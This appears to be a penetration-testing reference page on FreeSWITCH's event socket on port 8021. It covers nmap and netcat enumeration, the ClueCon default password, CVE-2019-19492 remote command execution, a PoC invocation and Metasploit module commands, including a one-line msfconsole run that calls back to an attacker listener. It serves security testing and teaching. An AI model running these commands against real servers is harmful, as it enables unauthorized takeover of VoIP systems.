8021 - FreeSWITCH

FreeSWITCH is an open-source VoIP platform commonly used for PBX systems, SIP trunking, and conferencing services. The mod_event_socket module in FreeSWITCH opens a TCP socket—typically on port 8021—which allows external applications to communicate with the switch using a command/response protocol.

This interface should never be exposed externally without robust access controls. If an attacker guesses or knows the event_socket_password—which defaults to ClueCon in many installations—they can authenticate and issue commands to the FreeSWITCH server. With successful authentication, an attacker could list and manage calls, inject audio or messages, execute arbitrary dial plans, and potentially escalate privileges further depending on the system's configuration.

Enumeration

# TCP scan with nmap
PORT     STATE SERVICE       VERSION

8021/tcp open  freeswitch-event FreeSWITCH mod_event_socket

# Manual service probbing
$ nc -nv 192.168.244.151 8021
(UNKNOWN) [192.168.244.151] 8021 (zope-ftp) open
Content-Type: auth/request
...
Content-Type: text/disconnect-notice
Content-Length: 67

Disconnected, goodbye.
See you at ClueCon! http://www.cluecon.com/

Upon probing with nc, the connection to the port succeeds and returns the message: Content-Type: auth/request, indicating that FreeSWITCH is prompting for a password. Authentication is usually performed using the command auth <password>. If the password is correct, the server responds with Content-Type: command/reply Reply-Text: +OK accepted.

Attacks

# Check default credentials
$ creds search freeswitch
+------------+----------+----------+
| Product    | username | password |
+------------+----------+----------+
| freeswitch | <blank>  | ClueCon  |
+------------+----------+----------+

FreeSWITCH versions 1.6.10 through 1.10.1 are vulnerable to RCE (CVE-2019-19492) due to a hardcoded default password (ClueCon) in the event_socket.conf.xml file. If unchanged, this allows remote attackers to authenticate to the Event Socket interface and execute arbitrary system commands through the FreeSWITCH service, making it a critical entry point for compromising VoIP infrastructure.

The default configuration files for FreeSwitch are under /etc/freeswitch/autoload_configs/:

# Recurvise, case-insensitive search
$ grep -Ri password

$ cat event_socket.conf.xml | grep password
    <param name="password" value="ClueCon"/>

This PoC allows easy exploitation of the above vulnerability:

$ uv run exploit.py --target <target>
# id

A Metasploit module exists for the above RCE vulnerability:

msf > use exploit/multi/misc/freeswitch_event_socket_cmd_exec
msf exploit(freeswitch_event_socket_cmd_exec) > show targets

Exploit targets:
=================

    Id  Name
    --  ----
=>  0   Unix (In-Memory)
    1   Linux (Dropper)
    2   PowerShell (In-Memory)
    3   Windows (In-Memory)
    4   Windows (Dropper)
    
msf exploit(freeswitch_event_socket_cmd_exec) > set TARGET <target-id>
msf exploit(freeswitch_event_socket_cmd_exec) > show options
msf exploit(freeswitch_event_socket_cmd_exec) > exploit

# Inline command
sudo msfconsole -q -x "use exploit/multi/misc/freeswitch_event_socket_cmd_exec; set TARGET 3; set RHOSTS <target-ip>; set LHOST tun0; run;"

Previous3632 - DISTCC Next9099 - Mobile Mouse

Last updated 8 days ago

Was this helpful?